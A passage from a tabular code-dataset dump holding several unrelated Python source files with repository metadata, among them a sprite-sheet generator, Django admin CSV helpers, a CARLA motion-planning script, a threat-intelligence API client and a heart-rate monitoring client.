hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a1d14e136fc6ab73bd62946ee36b52f8b5423c8b
| 1,001
|
py
|
Python
|
util/format_ldtk_battlers.py
|
Sipondo/ulix-dexflow
|
de46482fe08e3d600dd5da581f0524b55e5df961
|
[
"MIT"
] | 5
|
2021-06-25T16:44:38.000Z
|
2021-12-31T01:29:00.000Z
|
util/format_ldtk_battlers.py
|
Sipondo/ulix-dexflow
|
de46482fe08e3d600dd5da581f0524b55e5df961
|
[
"MIT"
] | null | null | null |
util/format_ldtk_battlers.py
|
Sipondo/ulix-dexflow
|
de46482fe08e3d600dd5da581f0524b55e5df961
|
[
"MIT"
] | 1
|
2021-06-25T20:33:47.000Z
|
2021-06-25T20:33:47.000Z
|
from pathlib import Path
import os
from PIL import Image, ImageFont, ImageDraw
import numpy as np
import pandas as pd
from math import *
p = Path("resources/graphics/Pokemon/Icons")
df = pd.read_csv(Path("resources/PBS/compressed/pokemon.csv"), index_col=0)
width = 64
height = ceil(len(df) / 64)
canvas = Image.new("RGBA", (width, height), "#00000000")
draw = ImageDraw.Draw(canvas)
for i, row in df.iterrows():
try:
img = (
Image.open(p / f"{row.internalname}.png")
.convert("RGBA")
.resize((64, 32), resample=Image.NEAREST)
.crop((0, 0, 32, 32))
)
canvas.alpha_composite(img, ((i % 64) * 32, (i // 64) * 32))
except Exception as e:
continue
canvas.save(Path("resources/graphics/generated/battler_ldtk_list.png"))
# for pth in p.glob("*.png"):
# img = (
# Image.open(pth)
# .convert("RGBA")
# .resize((64, 32), resample=Image.NEAREST)
# .crop((0, 0, 32, 32))
# )
| 25.025
| 75
| 0.592408
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 354
| 0.353646
|
a1d3d2bbc91fe562ff03d1024258dfe9a2092f42
| 4,237
|
py
|
Python
|
main/admin.py
|
japmeet01/fplmanager-website
|
c7a533f49acb04ee56876dff8759bb68468b0592
|
[
"MIT"
] | 5
|
2020-02-07T23:24:05.000Z
|
2021-07-23T23:37:41.000Z
|
main/admin.py
|
japmeet01/fplmanager-website
|
c7a533f49acb04ee56876dff8759bb68468b0592
|
[
"MIT"
] | 11
|
2020-01-13T10:02:33.000Z
|
2022-02-10T14:42:36.000Z
|
main/admin.py
|
japmeet01/fplmanager-website
|
c7a533f49acb04ee56876dff8759bb68468b0592
|
[
"MIT"
] | 11
|
2020-02-07T23:24:09.000Z
|
2020-10-16T14:57:54.000Z
|
from django.contrib import admin
from django.http import HttpResponse
from django.urls import path
from django.shortcuts import render, HttpResponse, redirect
from django import forms
import os
import csv
from io import TextIOWrapper, StringIO
from .models import Player, Team, Usage, XgLookup
class CsvImportForm(forms.Form):
csv_file = forms.FileField()
class NoLoggingMixin:
def log_addition(self, *args):
return
def log_change(self, *args):
return
def log_deletion(self, *args):
return
class ExportCsvMixin:
def export_as_csv(self, request, queryset):
meta = self.model._meta
field_names = [field.name for field in meta.fields]
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename={}.csv'.format(meta)
writer = csv.writer(response)
writer.writerow(field_names)
for obj in queryset:
row = writer.writerow([getattr(obj, field) for field in field_names])
return response
def export_delete_as_csv(self, request, queryset):
meta = self.model._meta
field_names = [field.name for field in meta.fields]
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename={}.csv'.format(meta)
writer = csv.writer(response)
writer.writerow(field_names)
for obj in queryset:
row = writer.writerow([getattr(obj, field) for field in field_names])
obj.delete()
return response
export_as_csv.short_description = "Export Selected"
export_delete_as_csv.short_description = "Export and Delete Selected"
class UploadCsvMixin:
def get_urls(self):
urls = super().get_urls()
my_urls = [
path('import-csv/', self.import_csv)
]
return my_urls + urls
def import_csv(self, request):
if request.method == 'POST':
csv_file = TextIOWrapper(request.FILES['csv_file'].file, encoding=request.encoding)
extension = os.path.splitext(request.FILES['csv_file'].name)[1]
if extension == '.csv':
reader = csv.reader(csv_file)
headers = next(reader)
model_fields = [m.name for m in self.model._meta.fields if m.name != 'updated']
# if set(headers) == set(model_fields):
input_data = [dict(zip(headers, row)) for row in reader]
for i in input_data:
t = self.model()
[setattr(t, k, v) for k, v in i.items()]
t.save()
# else:
# self.message_user(request, "Bad headers - unable to import selected file. Expected headers: '{expected}' Received headers: '{actual}'".format(
# expected=model_fields,
# actual=headers
# ), level='ERROR')
# return redirect("..")
else:
self.message_user(request, 'Incorrect file type', level='ERROR')
return redirect('..')
self.message_user(request, "Your csv file has been imported")
return redirect("..")
form = CsvImportForm()
payload = {"form": form}
return render(
request, "custom_admin/csv_form.html", payload
)
@admin.register(Player)
class PlayerAdmin(NoLoggingMixin, ExportCsvMixin, admin.ModelAdmin):
readonly_fields = ('updated',)
actions = ['export_as_csv']
@admin.register(Team)
class TeamAdmin(NoLoggingMixin, ExportCsvMixin, admin.ModelAdmin):
readonly_fields = ('updated',)
actions = ['export_as_csv']
@admin.register(Usage)
class UsageAdmin(NoLoggingMixin, ExportCsvMixin, admin.ModelAdmin):
readonly_fields = ('updated',)
actions = ['export_as_csv', 'export_delete_as_csv']
@admin.register(XgLookup)
class XgLookupAdmin(NoLoggingMixin, UploadCsvMixin, ExportCsvMixin, admin.ModelAdmin):
change_list_template = 'custom_admin/models_changelist.html'
readonly_fields = ('updated',)
actions = ['export_as_csv']
| 31.619403
| 164
| 0.618126
| 3,829
| 0.903705
| 0
| 0
| 739
| 0.174416
| 0
| 0
| 777
| 0.183384
|
a1d4680a92b1711d0003c4bd4a72a28789727f68
| 221
|
py
|
Python
|
Muta3DMaps/core/__init__.py
|
NatureGeorge/SIFTS_Plus_Muta_Maps
|
60f84e6024508e65ee3791103762b95666d3c646
|
[
"MIT"
] | null | null | null |
Muta3DMaps/core/__init__.py
|
NatureGeorge/SIFTS_Plus_Muta_Maps
|
60f84e6024508e65ee3791103762b95666d3c646
|
[
"MIT"
] | null | null | null |
Muta3DMaps/core/__init__.py
|
NatureGeorge/SIFTS_Plus_Muta_Maps
|
60f84e6024508e65ee3791103762b95666d3c646
|
[
"MIT"
] | null | null | null |
# @Created Date: 2019-11-24 09:07:07 pm
# @Filename: __init__.py
# @Email: 1730416009@stu.suda.edu.cn
# @Author: ZeFeng Zhu
# @Last Modified: 2019-12-23 04:23:51 pm
# @Copyright (c) 2019 MinghuiGroup, Soochow University
| 31.571429
| 54
| 0.714932
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 215
| 0.972851
|
a1d5ed8760ff10427163bf99b2b4a26de7553293
| 3,217
|
py
|
Python
|
tests/test_utils/test_file.py
|
dcambie/spectrochempy
|
e376082d66be7a4c528b7d83be076d77534e39bd
|
[
"CECILL-B"
] | 3
|
2021-04-09T09:13:21.000Z
|
2022-01-09T00:05:42.000Z
|
tests/test_utils/test_file.py
|
fernandezc/spectrochempy
|
4707c51dba0032c160afc40682fa16d4b9855ded
|
[
"CECILL-B"
] | null | null | null |
tests/test_utils/test_file.py
|
fernandezc/spectrochempy
|
4707c51dba0032c160afc40682fa16d4b9855ded
|
[
"CECILL-B"
] | null | null | null |
# -*- coding: utf-8 -*-
# =====================================================================================================================
# Copyright (©) 2015-2021 LCS - Laboratoire Catalyse et Spectrochimie, Caen, France. =
# CeCILL-B FREE SOFTWARE LICENSE AGREEMENT - See full LICENSE agreement in the root directory =
# =====================================================================================================================
#
# ======================================================================================================================
# Copyright (©) 2015-2021 LCS - Laboratoire Catalyse et Spectrochimie, Caen, France. =
# CeCILL-B FREE SOFTWARE LICENSE AGREEMENT - See full LICENSE agreement in the root directory =
# ======================================================================================================================
from pathlib import Path
from os import environ
from os.path import join
import pytest
from spectrochempy.core import preferences as prefs
from spectrochempy import NO_DISPLAY
from spectrochempy.utils import get_filename
def test_get_filename():
# should read in the default prefs.datadir (and for testing we fix the name to environ['TEST_FILE']
f = get_filename(filetypes=["OMNIC files (*.spg *.spa *.srs)",
"SpectroChemPy files (*.scp)"])
assert isinstance(f, dict)
f = get_filename(filetypes=["OMNIC files (*.spg *.spa *.srs)",
"SpectroChemPy files (*.scp)"],
dictionary=False)
assert isinstance(f, list)
assert isinstance(f[0], Path)
if NO_DISPLAY:
assert str(f[0]) == join(prefs.datadir, environ['TEST_FILE'])
# directory specified by a keyword as well as the filename
f = get_filename("nh4y-activation.spg", directory="irdata")
assert f == {
'.spg': [Path(prefs.datadir) / 'irdata' / 'nh4y-activation.spg']
}
# directory specified in the filename as a subpath of the data directory
f = get_filename("irdata/nh4y-activation.spg")
assert f == {
'.spg': [Path(prefs.datadir) / 'irdata' / 'nh4y-activation.spg']
}
# no directory specified (filename must be in the working or the default data directory
f = get_filename("wodger.spg")
# if it is not found an error is generated
with pytest.raises(IOError):
f = get_filename("nh4y-activation.spg")
# directory is implicit (we get every files inside, with an allowed extension)
# WARNING: Must end with a backslash
f = get_filename("irdata/",
filetypes=['OMNIC files (*.spa, *.spg)', 'OMNIC series (*.srs)', 'all files (*.*)'],
listdir=True)
if '.scp' in f.keys():
del f['.scp']
assert len(f.keys()) == 2
# should raise an error
with pytest.raises(IOError):
get_filename("~/xxxx",
filetypes=["OMNIC files (*.sp*)",
"SpectroChemPy files (*.scp)",
"all files (*)"])
# EOF
| 42.893333
| 120
| 0.500155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,944
| 0.603914
|
a1d778137bf41265c501edad6184cfc3fae9a1be
| 1,450
|
py
|
Python
|
toontown/safezone/ETreasurePlannerAI.py
|
SuperM0use24/TT-CL-Edition
|
fdad8394f0656ae122b687d603f72afafd220c65
|
[
"MIT"
] | null | null | null |
toontown/safezone/ETreasurePlannerAI.py
|
SuperM0use24/TT-CL-Edition
|
fdad8394f0656ae122b687d603f72afafd220c65
|
[
"MIT"
] | 1
|
2021-06-08T17:16:48.000Z
|
2021-06-08T17:16:48.000Z
|
toontown/safezone/ETreasurePlannerAI.py
|
SuperM0use24/TT-CL-Edition
|
fdad8394f0656ae122b687d603f72afafd220c65
|
[
"MIT"
] | 3
|
2021-06-03T05:36:36.000Z
|
2021-06-22T15:07:31.000Z
|
from toontown.safezone.DistributedETreasureAI import DistributedETreasureAI
from toontown.safezone.RegenTreasurePlannerAI import RegenTreasurePlannerAI
class ETreasurePlannerAI(RegenTreasurePlannerAI):
def __init__(self, zoneId):
self.healAmount = 2
self.spawnPoints = []
RegenTreasurePlannerAI.__init__(self, zoneId, DistributedETreasureAI, 'ETreasurePlanner', 15, 3)
def initSpawnPoints(self):
self.spawnPoints = [(19, -171, 0.0),
(-3, -100, 3.66),
(-4, -25, 7.0),
(1.15, 64.89, 4.858),
(-89, 43.4, 0.0),
(-114, -5, 1.8),
(-106, -98, 0.0),
(-1, -61, 1.0),
(130, 30, 0.0),
(-21, -7, 7.0),
(-27, 91, 0.0),
(-57, 0, 2.7),
(12, -128, -9.97),
(-1.8, 103.4, -8.0),
(-27.5, 6, -9.2),
(-29.6, -34.4, -5.4),
(-163.7, 13.8, 0.9),
(1.3, -107, 7.9),
(-87, -49, 0.05),
(45, 2.6, 8.0)]
return self.spawnPoints
def validAvatar(self, av):
return 0 < av.hp < av.maxHp
| 39.189189
| 104
| 0.37931
| 1,295
| 0.893103
| 0
| 0
| 0
| 0
| 0
| 0
| 18
| 0.012414
|
a1da8b92dc0cdcfd459c2434f84a887452586f81
| 2,204
|
py
|
Python
|
user_roles/role_add.py
|
PaloAltoNetworks/pcs-migration-management
|
766c8c861befa92e593b23ad6d248e33f62054bb
|
[
"ISC"
] | 1
|
2022-03-17T12:51:45.000Z
|
2022-03-17T12:51:45.000Z
|
user_roles/role_add.py
|
PaloAltoNetworks/pcs-migration-management
|
766c8c861befa92e593b23ad6d248e33f62054bb
|
[
"ISC"
] | 2
|
2021-11-03T15:34:40.000Z
|
2021-12-14T19:50:20.000Z
|
user_roles/role_add.py
|
PaloAltoNetworks/pcs-migration-management
|
766c8c861befa92e593b23ad6d248e33f62054bb
|
[
"ISC"
] | 4
|
2021-11-09T17:57:01.000Z
|
2022-01-24T17:41:21.000Z
|
from sdk.color_print import c_print
from user_roles import role_translate_id
from tqdm import tqdm
def add_roles(session, old_session, roles, logger):
added = 0
tenant_name = session.tenant
if roles:
logger.info(f'Adding User Roles to tenant: \'{tenant_name}\'')
#Translate Acc Grp IDs
logger.debug('API - Getting source Account Groups')
src_acc_grps = old_session.request('GET', '/cloud/group').json()
logger.debug('API - Getting destination Account Groups')
dest_acc_grps = session.request('GET', '/cloud/group').json()
#Translate Resource List IDs
logger.debug('API - Getting source Resource Lists')
src_rsc_lists = old_session.request('GET', '/v1/resource_list').json()
logger.debug('API - Getting destination Resource Lists')
dest_rsc_lists = session.request('GET', '/v1/resource_list').json()
for role in tqdm(roles, desc='Adding User Roles', leave=False):
#Translate Acc Grp IDs
if 'accountGroupIds' in role:
new_ids = []
for index in range(len(role['accountGroupIds'])):
old_id = role['accountGroupIds'][index]
new_id = role_translate_id.translate_acc_grp_ids(old_id, dest_acc_grps, src_acc_grps)
new_ids.append(new_id)
role.update(accountGroupIds=new_ids)
#Translate resource List IDS
if 'resourceListIds' in role:
new_ids = []
for index in range(len(role['resourceListIds'])):
old_id = role['resourceListIds'][index]
new_id = role_translate_id.translate_rsc_list_ids(old_id, dest_rsc_lists, src_rsc_lists)
new_ids.append(new_id)
role.update(resourceListIds=new_ids)
name = role['name']
logger.debug(f'API - Adding role: {name}')
res = session.request('POST', '/user/role', json=role)
if res.status_code == 200 or res.status_code == 201:
added += 1
else:
logger.info(f'No User Roles to add for tenant: \'{tenant_name}\'')
return added
| 42.384615
| 108
| 0.606624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 619
| 0.280853
|
a1dabed16e80b17dead966e6cd7f52d07e673b7f
| 6,641
|
py
|
Python
|
Apps/phdigitalshadows/dsapi/service/ds_base_service.py
|
ryanbsaunders/phantom-apps
|
1befda793a08d366fbd443894f993efb1baf9635
|
[
"Apache-2.0"
] | 74
|
2019-10-22T02:00:53.000Z
|
2022-03-15T12:56:13.000Z
|
Apps/phdigitalshadows/dsapi/service/ds_base_service.py
|
ryanbsaunders/phantom-apps
|
1befda793a08d366fbd443894f993efb1baf9635
|
[
"Apache-2.0"
] | 375
|
2019-10-22T20:53:50.000Z
|
2021-11-09T21:28:43.000Z
|
Apps/phdigitalshadows/dsapi/service/ds_base_service.py
|
ryanbsaunders/phantom-apps
|
1befda793a08d366fbd443894f993efb1baf9635
|
[
"Apache-2.0"
] | 175
|
2019-10-23T15:30:42.000Z
|
2021-11-05T21:33:31.000Z
|
# File: ds_base_service.py
#
# Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
#
import json
import time
import base64
from functools import wraps
from ..config import ds_api_host, ds_api_base
from .ds_abstract_service import DSAbstractService
class DSBaseService(DSAbstractService):
"""
Base Service that implements common operations for all DS services.
"""
def __init__(self, ds_api_key, ds_api_secret_key, proxy=None):
super(DSBaseService, self).__init__(proxy=proxy)
data_string = str(ds_api_key) + ":" + str(ds_api_secret_key)
data_bytes = data_string.encode("ascii")
data_bytes = base64.b64encode(data_bytes)
self._hash = data_bytes.decode("ascii")
self._url_base = '{}{}'.format(ds_api_host, ds_api_base)
def _headers(self, with_content_type=True):
headers = {
'Authorization': 'Basic {}'.format(self._hash),
}
if with_content_type:
headers['Content-Type'] = 'application/json'
return headers
def _request(self, path, method='GET', body=None, headers=None):
"""
Send a request to the Digital Shadows API.
:param path: API endpoint path, does not require host. eg. /api/session-user
:param method:
:param body:
:param headers:
:return: tuple(response, content)
"""
url = '{}{}'.format(self._url_base, path)
headers = self._headers() if headers is None else headers
response, content = super(DSBaseService, self)._request(url,
method=method,
body=str(body).replace("'", '"'),
headers=headers)
if int(response['status']) == 200:
return json.loads(content)
else:
raise RuntimeError('{} responded with status code {}'.format(url, response['status']))
def _request_post(self, path, method='POST', body=None, headers=None):
"""
Send a request to the Digital Shadows API.
:param path: API endpoint path, does not require host. eg. /api/session-user
:param method:
:param body:
:param headers:
:return: tuple(response, content)
"""
url = '{}{}'.format(self._url_base, path)
headers = self._headers() if headers is None else headers
response, content = super(DSBaseService, self)._request(url,
method=method,
body=str(body).replace("'", '"'),
headers=headers)
if int(response['status']) in (200, 204):
if content != "":
res_text = json.loads(content)
else:
res_text = ""
post_response = {
'status': response['status'],
'message': 'SUCCESS',
'content': []
}
post_response['content'].append(res_text)
return post_response
else:
raise RuntimeError('{} responded with status code {}'.format(url, response['status']))
def _scrolling_request(self, path, method='GET', body=None, headers=None):
"""
Scrolls through a paginated response from the Digital Shadows API.
:param path: API endpoint path, does not require host. eg. /api/session-user
:param method:
:param body: View object - requires pagination field, see DSBaseService.paginated decorator
:return: tuple(response, content)
"""
assert 'pagination' in body
paginated_view = body
url = '{}{}'.format(self._url_base, path)
headers = self._headers() if headers is None else headers
scrolling = True
while scrolling:
response, content = super(DSBaseService, self)._request(url,
method,
body=str(paginated_view).replace("'", '"'),
headers=headers)
if int(response['status']) == 200:
data = json.loads(content)
offset = data['currentPage']['offset']
size = data['currentPage']['size']
total = data['total']
if offset + size < total:
paginated_view['pagination']['offset'] = offset + size
else:
scrolling = False
yield data
elif int(response['status']) == 429:
# rate limited, wait before resuming scroll requests
time.sleep(1)
else:
scrolling = False
def valid_credentials(self):
"""
Checks if the provided Digital Shadows credentials are valid.
:return: bool
"""
path = '/api/session-user'
url = '{}{}'.format(self._url_base, path)
response, content = super(DSBaseService, self)._request(url,
headers=self._headers(with_content_type=False))
return int(response['status']) == 200
@staticmethod
def paginated(offset=0, size=500):
def paginated_decorator(view_function):
@wraps(view_function)
def view_wrapper(*args, **kwargs):
pagination = {
'pagination': {
'offset': offset,
'size': size
}
}
view = view_function(*args, **kwargs)
pagination.update(view)
return pagination
return view_wrapper
return paginated_decorator
@staticmethod
def sorted(sort_property, reverse=False):
def sorted_decorator(view_function):
@wraps(view_function)
def view_wrapper(*args, **kwargs):
sort = {
'sort': {
'property': sort_property,
'direction': "ASCENDING" if reverse else "DESCENDING"
}
}
view = view_function(*args, **kwargs)
sort.update(view)
return sort
return view_wrapper
return sorted_decorator
| 38.166667
| 111
| 0.511971
| 6,362
| 0.957988
| 1,642
| 0.247252
| 1,151
| 0.173317
| 0
| 0
| 1,705
| 0.256738
|
a1dac102f27e519bf75cf582e4948e7c1ea1984f
| 4,216
|
py
|
Python
|
examples/motion_planning.py
|
luisgaboardi/Motion-Planning-Carla-Simulator
|
4270fd3b7e488876a8ac249c217a7fb219e8d27b
|
[
"MIT"
] | null | null | null |
examples/motion_planning.py
|
luisgaboardi/Motion-Planning-Carla-Simulator
|
4270fd3b7e488876a8ac249c217a7fb219e8d27b
|
[
"MIT"
] | 4
|
2021-05-13T11:33:06.000Z
|
2022-02-08T06:26:55.000Z
|
examples/motion_planning.py
|
luisgaboardi/Motion-Planning-Carla-Simulator
|
4270fd3b7e488876a8ac249c217a7fb219e8d27b
|
[
"MIT"
] | null | null | null |
# Imports para o Carla
import glob
import os
import sys
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
import carla
try:
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + '/carla')
except IndexError:
pass
from agents.navigation.unb_agent import Agent
"""
Esse script consiste na implementação de alguns módulos de veículos autônomos:
- Controladores PID para controle longitudinal e lateral
- Alteração de rota dinamicamente mediante tratamento de sinal de
um sensor de obstáculo posicionado na frente do véiculo.
Com isso, o veículo sai de um ponto inicial, desvia de dois obstáculos
mudando de faixa e detectando um semáforo vermelho, para antes do cruzamento
"""
def main():
actor_list = []
try:
# Conecta cliente à simulação
client = carla.Client('localhost', 2000)
client.set_timeout(10.0)
# Configura a simulação através do cliente
world = client.get_world()
_map = world.get_map()
settings = world.get_settings()
"""
No modo síncrono configurado abaixo, o servidor espera um "tick" do cliente,
que é uma mensagem de "pronto para prosseguir", antes de atualizar para o próximo
passo da simulação. Na prática, isso significa que a simulação espera os cálculos
realizados pelo cliente para prosseguir.
"""
settings.synchronous_mode = True
"""
A configuração abaixo permite a definição de um
intervalo fixo entre os "passos" da simulação.
Se setado para 0.022, acontecerão aproximadamente
45 frames por segundo simulado
"""
settings.fixed_delta_seconds = 0.022
world.apply_settings(settings)
# Spawn do ego veículo e escolha do ponto de destino
blueprint_library = world.get_blueprint_library()
vehicle_bp = blueprint_library.filter('bmw')[0]
spawn_point = _map.get_spawn_points()[64]
destination_point = _map.get_spawn_points()[31]
vehicle = world.spawn_actor(vehicle_bp, spawn_point)
actor_list.append(vehicle)
world.tick()
# Spawn primeiro obstáculo
obstacle_bp = blueprint_library.filter('vehicle.audi.a2')[0]
obstacle_spawn_point = _map.get_spawn_points()[62]
obstacle = world.spawn_actor(obstacle_bp, obstacle_spawn_point)
actor_list.append(obstacle)
# Spawn segundo obstáculo
obstacle_spawn_point = carla.Transform(carla.Location(x=-88.056326, y=-48.930733, z=0.930733), carla.Rotation(pitch=0.000000, yaw=89.787674, roll=0.000000))
obstacle2 = world.spawn_actor(obstacle_bp, obstacle_spawn_point)
actor_list.append(obstacle2)
world.tick()
# Cria agente e o vincula ao ego veículo
agent = Agent(vehicle, ignore_traffic_light=False)
actor_list.append(agent._camera)
actor_list.append(agent.obstacle_sensor)
# Gera rota
agent.set_route(spawn_point.location, destination_point.location)
# Gameloop
while not agent.arrived():
world.tick()
world.get_spectator().set_transform(agent._camera.get_transform())
# Gera o comando de controle ao veículo
control = agent.run_step(speed=(vehicle.get_speed_limit())) or agent.emergency_stop()
vehicle.apply_control(control)
# Visualização da rota
agent.show_path(distance=int(agent.get_speed(vehicle)/2))
finally:
print("Destino alcançado!")
print('Destruindo Atores')
# Parar sensores ativos pois eles não param automaticamente ao fim da execução
agent.obstacle_sensor.stop()
client.apply_batch([carla.command.DestroyActor(x) for x in actor_list])
print('Done.')
world.tick()
# Desabilita modo síncrono para permitir movimentação da tela
settings.synchronous_mode = False
world.apply_settings(settings)
if __name__ == '__main__':
main()
| 36.344828
| 164
| 0.671015
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,645
| 0.385788
|
a1dad65039164684afc4c0a9e16a88052f3e201e
| 5,705
|
py
|
Python
|
hr_api.py
|
AznStevy/heart_rate_sentinel_server
|
e241ee705221be643a3c3773a2e5ed9c129c733f
|
[
"MIT"
] | null | null | null |
hr_api.py
|
AznStevy/heart_rate_sentinel_server
|
e241ee705221be643a3c3773a2e5ed9c129c733f
|
[
"MIT"
] | 4
|
2018-11-13T20:44:50.000Z
|
2018-11-16T19:47:09.000Z
|
hr_api.py
|
AznStevy/heart_rate_sentinel_server
|
e241ee705221be643a3c3773a2e5ed9c129c733f
|
[
"MIT"
] | null | null | null |
import json
import requests
post_url = "http://127.0.0.1:5000/api/"
# ---------- general web interfacing ----------------------
def post(endpoint, payload, uri="http://127.0.0.1:5000/api/"):
"""
Posts to the flask web server.
Args:
endpoint: The endpoint of the API
payload: Payload according to what the web server requires.
uri: Web server uri.
Returns:
object: Response from web server.
"""
return requests.post(uri + endpoint, json=payload)
def get(endpoint, uri="http://127.0.0.1:5000/api/"):
"""
Gets from the flask web server.
Args:
endpoint: The endpoint of the API
uri: Web server uri.
Returns:
object: Response from web server.
"""
return requests.get(uri + endpoint)
# ---------- API ----------------------
def get_all_patients():
"""
Obtains a list of all patients in the database. (For testing)
Returns:
dict: All patients currently in database referenced by ID.
"""
resp = get("all_patients")
return byte_2_json(resp)
def add_new_patient(patient_id: str, attending_email: str, user_age: int):
"""
Adds new patient to the database.
Args:
patient_id: ID of the patient.
attending_email: Email of the user
user_age: Age of the user.
Returns:
dict: Patient that added.
"""
payload = {
"patient_id": patient_id,
"attending_email": attending_email,
"user_age": user_age
}
resp = post("new_patient", payload)
return byte_2_json(resp)
def get_interval_average(patient_id: str, timestamp: str):
"""
Gets the average heart rate from before a timestamp.
Args:
patient_id: ID of the patient.
timestamp: timestamp in form YYYY-MM-DD HH:MM:SS.#######
Returns:
float: Average heart rate from before the timestamp.
"""
payload = {
"patient_id": patient_id,
"heart_rate_average_since": timestamp,
}
resp = post("heart_rate/interval_average", payload)
return byte_2_json(resp)
def post_heart_rate(patient_id: str, heart_rate: int):
"""
Posts a heart rate to a patient. Timestamp automatically generated.
Args:
patient_id: ID of the patient.
heart_rate: Heart rate to post.
Returns:
dict: Updated patient information.
"""
payload = {
"patient_id": patient_id,
"heart_rate": heart_rate,
}
resp = post("heart_rate", payload)
return byte_2_json(resp)
def get_patient_status(patient_id: str):
"""
Obtains patient status. Sends email if tachychardic.
Args:
patient_id: ID of the patient.
Returns:
tuple: first is if tachychardic, second is timestamp.
"""
resp = get("status/{}".format(patient_id))
return byte_2_json(resp)
def get_heart_rate(patient_id: str):
"""
Obtains all heart rates from the
Args:
patient_id: ID of the patient.
Returns:
list: List of all heart rates from the patient.
"""
resp = get("heart_rate/{}".format(patient_id))
return byte_2_json(resp)
def get_heart_rate_average(patient_id: str):
"""
Obtains an average heart rate of the patient.
Args:
patient_id: ID of the patient.
Returns:
float: Average heart rate of the patient.
"""
resp = get("heart_rate/average/{}".format(patient_id))
return byte_2_json(resp)
def byte_2_json(resp):
"""
Converts bytes to json. Raises exception if necessary.
Args:
resp (bytes): Response from request.
Returns:
dict: Json object of interest.
"""
json_resp = json.loads(resp.content.decode('utf-8'))
json_resp = error_catcher(json_resp)
return json_resp
def error_catcher(json_resp: dict):
"""
Raises appropriate exceptions from the web server.
Args:
json_resp: Information from the server.
Returns:
dict: The original dictionary if not error.
"""
if type(json_resp) == dict and "error_type" in json_resp.keys():
if "TypeError" in json_resp["error_type"]:
raise TypeError(json_resp["msg"])
if "AttributeError" in json_resp["error_type"]:
raise AttributeError(json_resp["msg"])
if "ValueError" in json_resp["error_type"]:
raise ValueError(json_resp["msg"])
return json_resp
if __name__ == "__main__":
from random import choice
from string import ascii_uppercase
p_id = ''.join(choice(ascii_uppercase) for _ in range(10))
print(p_id)
r = add_new_patient(p_id, "szx2@duke.edu", 21)
print(r)
r = post_heart_rate(p_id, 80)
print("Posted: ", r)
hr = get_heart_rate(p_id)
print("All Heartrates:", hr)
r = post_heart_rate(p_id, 90)
print("Posted: ", r)
av = get_heart_rate_average(p_id)
print("Average: ", av)
hr = get_heart_rate(p_id)
print("All Heartrates:", hr)
curr_status, timestamp = get_patient_status(p_id)
print("Current Status 1 (False/Not Tach): ", curr_status, "Timestamp: ", timestamp)
int_avg = get_interval_average(p_id, timestamp)
print("Interval Average (should be 85):", int_avg)
r = post_heart_rate(p_id, 100)
print("Posted: ", r)
hr = get_heart_rate(p_id)
print("All Heartrates:", hr)
r = post_heart_rate(p_id, 110)
curr_status, _ = get_patient_status(p_id)
print("Current Status 2 (True/Tach + sends email): ", curr_status, "Timestamp: ", timestamp)
av = get_heart_rate_average(p_id)
print("Average (95): ", av)
int_avg = get_interval_average(p_id, timestamp)
print("Interval Average (should be 85):", int_avg)
| 26.169725
| 96
| 0.632954
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,032
| 0.531464
|
a1dba833aadc169502823d1b0bf416f69fbfd572
| 1,845
|
py
|
Python
|
upload/tasks/import_gene_list_task.py
|
SACGF/variantgrid
|
515195e2f03a0da3a3e5f2919d8e0431babfd9c9
|
[
"RSA-MD"
] | 5
|
2021-01-14T03:34:42.000Z
|
2022-03-07T15:34:18.000Z
|
upload/tasks/import_gene_list_task.py
|
SACGF/variantgrid
|
515195e2f03a0da3a3e5f2919d8e0431babfd9c9
|
[
"RSA-MD"
] | 551
|
2020-10-19T00:02:38.000Z
|
2022-03-30T02:18:22.000Z
|
upload/tasks/import_gene_list_task.py
|
SACGF/variantgrid
|
515195e2f03a0da3a3e5f2919d8e0431babfd9c9
|
[
"RSA-MD"
] | null | null | null |
from genes.gene_matching import tokenize_gene_symbols, GeneSymbolMatcher
from genes.models import GeneList
from snpdb.models import ImportStatus
from upload.models import UploadedGeneList
from upload.tasks.import_task import ImportTask
